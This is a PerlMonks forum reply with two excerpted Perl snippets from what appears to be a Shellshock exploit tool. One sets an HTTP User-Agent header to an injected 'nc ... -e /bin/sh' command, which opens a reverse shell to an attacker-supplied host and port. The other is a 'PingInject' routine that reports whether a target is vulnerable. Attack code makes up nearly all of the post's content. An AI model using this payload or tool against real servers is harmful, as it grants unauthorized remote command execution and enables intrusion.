Beefy Boxes and Bandwidth Generously Provided by pair Networks
Keep It Simple, Stupid
 
PerlMonks  

Re^2: Raw HTTP Request / Response

by Ghosty (Novice)
on Aug 24, 2018 at 11:11 UTC ( [id://1221011]=note: print w/replies, xml ) Need Help??

Help for this page

Select Code to Download


  1. or download this
    $ua = new LWP::UserAgent;
    $ua->agent("$Inject; nc $bip $bport -e /bin/sh'");
    ...
    $code = $response->code;
    $headers = $response->headers_as_string;
    $body =  $response->content;
    
  2. or download this
    sub PingInject{
    $url = "$target";
    ...
      print "[-] Shellshock Ping Injection was not injected successfully! 
    +(Not Vulnerable!) \n";
    }
    }
    

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://1221011]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others studying the Monastery: (7)
As of 2024-04-24 07:20 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found